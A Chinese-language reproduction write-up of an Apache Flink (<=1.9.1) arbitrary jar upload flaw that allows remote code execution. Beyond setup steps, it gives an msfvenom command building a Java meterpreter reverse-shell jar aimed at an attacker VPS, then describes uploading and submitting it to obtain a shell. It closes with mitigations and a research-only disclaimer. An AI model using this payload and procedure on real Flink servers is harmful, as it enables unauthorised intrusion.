Apache Flink任意jar包上传漏洞复现

隐患名称	apache flink任意jar包上传导致远程代码执行
威胁等级	高
影响范围	<= 1.9.1(目前官网最新版本)

1.使用java1.8以上的环境，这里我用的centos7自带的：

 

 

2.下载flink：

wget https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

3.下载后解压并进入目录：

 

4.启动flink:

 

注：这里如果没有执行权限的话执行：chmod +x start-cluster.sh

5.启动后默认端口是8081，视情况添加防火墙规则：

firewall-cmd --zone=public --add-port=8081/tcp --permanent

firewall-cmd --reload

 

6.访问对应地址：

http://ip:8081

 

到这里，环境就搭好了，后门开始复现：

因为目标用了flink，说明是有java环境，这里直接用java进行反弹shell:

用msfvenom：

 

msfvenom -p java/meterpreter/reverse_tcp LHOST=VPS-IP LPORT=VPS监听端口 W >javashell.jar

配置监听器：

然后把马上传上去：

上传成功：

点击上传的文件，点击submit:

触发成功，VPS收到SHELL：

修复建议：

截至我复现的时候，这个flink包的版本仍然是官网提供的最新版本：

所以目前只能做的只是缓解措施，例如在防火墙上做访问控制、限制上传后目录的执行权限等。

 

----------------------------------------------------------------------

免责声明

本文中提到的漏洞利用Poc和脚本仅供研究学习使用，请遵守《网络安全法》等相关法律法规。